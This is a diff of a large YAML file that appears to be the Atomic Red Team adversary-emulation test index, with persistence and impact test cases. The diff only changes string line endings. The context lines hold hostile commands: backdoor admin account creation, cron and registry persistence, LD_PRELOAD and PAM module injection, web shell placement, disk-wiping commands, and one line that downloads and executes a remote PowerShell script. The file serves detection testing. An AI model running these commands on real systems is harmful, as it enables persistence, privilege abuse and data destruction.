@@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: 
@@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" -' + ' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: 
@@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true 
@@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd -' + ' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} -' + ' cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl -' + ' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} -' + ' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" -' + ' cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create a new user in PowerShell 
@@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword -' + ' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -' + ' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} -' + ' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1556.004: technique: 
@@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" -' + ' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 -' + ' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f -' + ' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 -' + ' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1205.001: technique: external_references: @@ -47045,11 +47045,11 @@ persistence: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.013: @@ -47135,7 +47135,7 @@ persistence: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -47151,13 +47151,13 @@ persistence: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -47375,14 +47375,14 @@ persistence: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -47398,12 +47398,12 @@ persistence: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -47419,7 +47419,7 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce 
@@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; -' + ' cleanup_command: 'unset ssh_authorized_keys -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 
@@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer 
@@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed -' + ' prereq_command: 'Get-TransportAgent -TransportService FrontEnd -' + ' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -' + ' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) -' + ' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} -' + ' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) -' + ' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force 
@@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes -' + ' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: -' + ' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located -' + ' prereq_command: 'which_gpg=`which gpg` -' + ' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} -' + ' cleanup_command: 'rm #{encrypted_file_path} -' + ' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located -' + ' prereq_command: 'which_7z=`which 7z` -' + ' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. -' + ' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file -' + ' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` 
